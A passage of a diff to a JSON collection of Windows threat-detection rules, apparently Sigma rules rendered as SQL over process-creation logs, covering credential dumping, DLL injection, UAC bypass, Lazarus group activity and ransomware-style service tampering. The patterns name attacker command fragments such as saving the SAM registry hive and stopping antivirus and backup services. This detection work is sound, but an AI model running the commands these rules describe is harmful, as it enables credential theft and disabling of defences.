CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", - "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.005" + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1555.004" + ], + "falsepositives": [ + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], - "filename": "proc_creation_win_pua_process_hacker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", + "status": "experimental", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "status": "experimental", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' 